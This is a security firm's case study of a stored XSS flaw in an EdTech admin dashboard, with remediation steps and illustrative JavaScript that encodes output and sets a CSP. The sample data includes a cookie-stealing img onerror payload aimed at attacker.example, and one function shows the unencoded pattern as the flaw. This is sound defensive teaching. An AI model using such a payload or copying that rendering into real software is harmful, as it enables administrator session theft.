HackVitraSec - Cybersecurity Company India | VAPT, Ethical Hacking, Web App Security

Case Study: Stored XSS in EdTech Platform

Client Type: EdTech Portal | Engagement: Web VAPT | Date: July 2025

Background

A fast-growing EdTech company serving 100,000+ students and educators observed suspicious activity in its administrator accounts. HackVitraSec was engaged to perform a security audit focused on the user profile management functionality.

Vulnerability Discovered

Our team uncovered a persistent (stored) cross-site scripting (XSS) vulnerability. The "student name" field accepted arbitrary HTML and JavaScript and stored it verbatim; the admin dashboard later inserted the stored value into the page without output encoding. Any student could therefore plant a payload in their own profile that executed in the browser of every administrator who viewed the student list.

Impact Analysis

  • Admin session hijacking: the payload could exfiltrate the administrator's cookies or, where the session cookie is protected by the HttpOnly flag, simply issue requests from the administrator's browser using their live session
  • Compromise of the internal admin panel, since any action the panel exposes could be performed with administrator privileges
  • Severe trust and brand damage if exploited publicly

Remediation Strategy

  • Implemented context-aware output encoding (HTML entity encoding) of user-supplied data at the point where the dashboard renders it
  • Added a Content Security Policy (CSP) that blocks inline script execution, including inline event handlers, so that a bypass of the encoding would still not execute
  • Sanitized legacy user input data already stored in the database, because encoding at output alone would have left the existing payloads in place for any other consumer of the data
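As an added illustration, not code from HackVitraSec or the client, the following Node.js snippet models the flaw described under Vulnerability Discovered and the three remediation steps above: the vulnerable rendering beside the encoded rendering, input validation as a secondary control, a nonce-based CSP header value, and a scan for legacy records that still contain markup. The student records, the payload, the attacker.example domain and the nonce value are constructed for the demonstration.

```javascript
// Added example, not HackVitraSec's or the client's code. It models a
// "student name" stored verbatim and later interpolated into the admin
// dashboard, plus the remediation steps. All data below is constructed.

// Minimal HTML-entity encoder for the HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Constructed sample of the profile table after an attacker edited their own
// name. Record 3 carries an illustrative cookie-stealing payload.
const students = [
  { id: 1, name: 'Asha Verma' },
  { id: 2, name: "Seán O'Brien" },
  { id: 3, name: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' },
];

// BEFORE: the pattern the audit found. The name lands in the page as markup.
function renderAdminRowVulnerable(student) {
  return `<tr><td>${student.id}</td><td>${student.name}</td></tr>`;
}

// AFTER: encode at the point of output, regardless of what the database holds.
function renderAdminRowSafe(student) {
  return `<tr><td>${student.id}</td><td>${escapeHtml(student.name)}</td></tr>`;
}

// Input validation as a secondary control: letters in any script, combining
// marks, spaces, apostrophes, dots and hyphens. The apostrophe in O'Brien is
// legitimate, which is why validation cannot replace output encoding.
function isValidStudentName(name) {
  return /^[\p{L}\p{M}' .-]{1,100}$/u.test(name);
}

// Defence in depth: a CSP value that refuses inline handlers such as onerror=
// and only runs scripts carrying the per-response nonce. Send it as the
// Content-Security-Policy response header with a fresh nonce per response.
function buildCsp(nonce) {
  return `default-src 'self'; script-src 'self' 'nonce-${nonce}'; object-src 'none'; base-uri 'self'`;
}

// Legacy cleanup: find already-stored names that fail validation (markup,
// control characters, excessive length) so they can be reviewed and normalised.
function findSuspiciousNames(rows) {
  return rows.filter((r) => !isValidStudentName(r.name)).map((r) => r.id);
}

// Stand-alone run: show the vulnerable and fixed rendering side by side.
if (typeof require !== 'undefined' && require.main === module) {
  for (const s of students) {
    console.log('vulnerable:', renderAdminRowVulnerable(s));
    console.log('safe:      ', renderAdminRowSafe(s));
  }
  console.log('CSP:', buildCsp('r4nd0m'));
  console.log('rows to clean:', findSuspiciousNames(students));
}
```

The encoder is deliberately limited to the HTML text and quoted-attribute contexts; data placed into a JavaScript block, a URL or a CSS value needs the encoder for that context, and a template engine that auto-escapes by default is preferable to hand-rolled calls. The nonce-based CSP avoids 'unsafe-inline' entirely, which is what actually neutralises the onerror= handler in the sample payload.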

Key Learnings

  • Always encode user-controlled data wherever it is displayed, including admin and internal panels, which are often assumed to be trusted and receive less scrutiny; validate input as a secondary control, not a substitute for encoding
  • Use security headers such as Content-Security-Policy as defence in depth against XSS payloads, not as the primary fix
  • Test every create and update path (CRUD operations) for stored XSS during VAPT, and check whether the stored value surfaces in other views such as admin dashboards

Need a Web Security Audit?

Contact HackVitraSec Today